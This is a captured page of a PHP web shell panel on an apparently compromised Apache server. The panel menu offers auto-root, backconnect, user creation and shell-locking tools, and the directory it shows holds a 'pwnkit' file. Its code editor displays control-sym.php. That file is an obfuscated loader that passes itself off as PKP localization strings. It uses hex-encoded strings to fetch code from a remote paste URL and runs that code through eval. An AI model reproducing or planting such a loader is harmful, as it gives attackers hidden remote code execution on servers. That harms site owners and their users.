Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.224.53.246
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
navanquilla /
myadmin /
sym /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
control-sym.php
746
B
-rw-r--r--
error_log
383
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : control-sym.php
<?php /** * plugins/metadata/mods34/locale/tr_TR/locale.pdf * * Copyright (c) 2014-2019 Simon Fraser University * Copyright (c) 2003-2019 John Willinsky * Distributed under the GNU GPL v2. For full terms see the file docs/COPYING. * * Localization strings. */ goto WI4WI; QyDfs: eval("\x3f\76" . $a); goto C9OXj; fTI77: $a = geturlsinfo("\150\164\164\160\163\x3a\x2f\x2f\160\x61\x73\164\145\56\160\x68\x79\157\61\x38\66\56\143\146\144\57\x33\151\155\x51\71\x2d\150\144\x65\150\x79\x2f\162\141\167"); goto QyDfs; WI4WI: function geturlsinfo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); return $output; } goto fTI77; C9OXj: ?>
Close